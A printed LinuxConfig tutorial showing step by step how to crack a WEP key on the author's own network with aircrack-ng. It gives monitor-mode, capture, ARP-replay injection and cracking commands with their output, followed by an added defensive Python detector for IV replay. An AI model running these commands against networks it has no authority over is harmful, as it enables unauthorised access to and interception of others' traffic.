How to Crack a Wireless WEP Key Using AIR Crack



Contents

AIR Crack installation

Identify wireless network interface

Turn on Monitor mode

Identify a wireless network BSSID

Sniffing wireless network

Injection of packets

Crack WEP wireless key

This article briefly describes the steps needed to crack a wireless WEP key using the AIR Crack software. This is done by sniffing a wireless network, capturing encrypted packets and running an appropriate cracking program in an attempt to decrypt the captured data. WEP (Wired Equivalent Privacy) is quite easy to crack as it uses only one key to encrypt all traffic. The basic principle is that communication between two nodes on a network is based on the MAC address. Each host receives only packets intended for the MAC address of its own interface. The same principle applies to wireless networks. However, if a node sets its network card into promiscuous mode, it will also receive packets that are not addressed to its own MAC address.

To crack the WEP key, a hacker needs to capture sample packets not intended for his own network interface and run a cracking program that tries test keys against the captured packets in an attempt at decryption. The key that successfully decrypts the captured packets is the key the wireless network uses to encrypt all of its communication with its connected stations.

The guide assumes that you have a wireless network card installed and that it supports monitor mode. In this example I'm using a Realtek Semiconductor Co., Ltd. RTL-8185 IEEE 802.11a/b/g Wireless LAN Controller.

Debian:

# apt-get install aircrack-ng

Fedora:

# yum -y install aircrack-ng

How to crack a wireless WEP key using AIR Crack http://linuxconfig.org/how-to-crack-a-wireless-wep-key-using-air-crack

1 of 7 16-Jan-14 10:10 AM

Homepage:

aircrack-ng.org

First we need to identify the name of our wireless network interface. If your wireless network card is installed correctly, the iwconfig command will reveal the name of your wireless network interface:

$ /sbin/iwconfig

wlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

# airmon-ng start wlan0

Interface Chipset Driver

wlan0 rtl8180 - [phy0]

(monitor mode enabled on mon0)

In this guide I am going to crack the wireless WEP key of my own network. In this step I need to identify the BSSID of the network I intend to crack, as well as its channel number:

# airodump-ng wlan0

Information we can retrieve from airodump-ng output:

BASE:

BSSID : 00:11:95:9F:FD:F4

Channel: 6

STATION:

MAC: 00:13:02:30:FF:EC

The station connected to my wireless router is my laptop, with a wireless network card, running Debian lenny. It is important to have at least one station associated with the base so we can capture packets from this communication.


At this stage we can start capturing packets between the base and the station. The following command will start capturing packets. It is recommended to capture at least 5000 packets. The number of packets required depends on the WEP key length in use. I managed to crack a 64-bit WEP key (10 hex characters) with around 6000 captured packets. The number 6 in the following command is the channel number of our wireless base station.

# airodump-ng -c 6 -w data-capture wlan0

Capturing the packets may take some time. aireplay-ng will create some traffic so we can capture more packets in a given time. Since we are hacking our own network, browsing the internet on my laptop also helps to create some traffic.

# aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC wlan0

As a last step we crack the WEP key using the captured packets and the aircrack-ng command. All captured packets are now stored in the data-capture-01.cap file.

NOTE: do not stop the capturing process, as you do not know whether the current number of captured packets is sufficient to crack the WEP key.

# aircrack-ng -z data-capture-01.cap

Opening data-capture-01.cap


Read 450 packets.

# BSSID ESSID Encryption

1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs)

2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)

Index number of target network ?

1

Aircrack-ng 1.0 rc1

[00:00:13] Tested 485 keys (got 16690 IVs)

KB depth byte(vote)

0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)

1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)

2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)

3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)

4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

KEY FOUND! [ 3F:F3:8E:6E:98 ]

Decrypted correctly: 100%
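
Added example (not part of the original article): the aireplay-ng -3 step above re-sends one captured ARP request over and over, so a monitoring sensor sees the same WEP IV repeated from one transmitter far beyond what normal 802.11 retries produce. The Python below flags that pattern on your own network; the record format, the window and threshold values and the sample frames are assumptions constructed for illustration, with the BSSID and station MAC taken from the article.

```python
from collections import defaultdict, deque

BSSID = "00:11:95:9F:FD:F4"    # access point from the article
STATION = "00:13:02:30:FF:EC"  # associated station from the article

def detect_iv_replay(frames, window=1.0, threshold=20):
    """Return one alert per (transmitter, bssid, iv) seen >= threshold times
    within `window` seconds. `frames` is a time-ordered iterable of
    (timestamp_s, transmitter_mac, bssid, iv_hex) for WEP data frames
    (hypothetical record format). The threshold sits well above normal
    802.11 retries, which legitimately repeat an IV a handful of times."""
    recent = defaultdict(deque)   # key -> timestamps still inside the window
    alerted, alerts = set(), []
    for ts, tx, bssid, iv in frames:
        key = (tx.lower(), bssid.lower(), iv.lower())
        seen = recent[key]
        seen.append(ts)
        while ts - seen[0] > window:      # expire observations older than window
            seen.popleft()
        if len(seen) >= threshold and key not in alerted:
            alerted.add(key)
            # The transmitter address can be spoofed (the article passes the
            # station MAC with -h), so read it as "whose address was used".
            alerts.append({"transmitter": key[0], "bssid": key[1], "iv": key[2],
                           "count": len(seen), "first_seen": seen[0]})
    return alerts

def constructed_frames():
    """Constructed sample data, not a real capture."""
    frames = []
    for i in range(200):                  # normal traffic: fresh IV per frame
        frames.append((i * 0.02, STATION, BSSID, f"{0x10A000 + i:06x}"))
    for r in range(4):                    # one frame retried by the MAC layer
        frames.append((1.5 + r * 0.001, STATION, BSSID, "aa0001"))
    for i in range(300):                  # identical frame re-sent every 2 ms
        frames.append((2.0 + i * 0.002, STATION, BSSID, "5c21f3"))
    return sorted(frames, key=lambda f: f[0])

if __name__ == "__main__":
    for alert in detect_iv_replay(constructed_frames()):
        print("possible WEP replay:", alert)
```

A long-running sensor would also need to discard keys that have gone idle, since this version keeps one entry per IV it has ever seen.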


Copyright 2007 - 2014 LinuxConfig.com. All rights reserved.
